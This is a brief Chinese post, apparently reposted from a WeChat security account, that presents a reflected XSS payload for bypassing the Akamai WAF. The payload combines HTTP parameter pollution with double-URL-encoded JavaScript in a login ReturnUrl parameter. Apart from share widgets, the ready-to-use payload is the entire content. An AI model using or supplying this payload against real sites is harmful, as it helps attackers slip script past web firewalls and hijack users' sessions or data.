使用HTTP参数污染和Double Url编码在重定向参数中反映的XSS Akami Waf绕行:
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
本文始发于微信公众号(Khan安全攻防实验室):XSS Akami Waf绕过
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论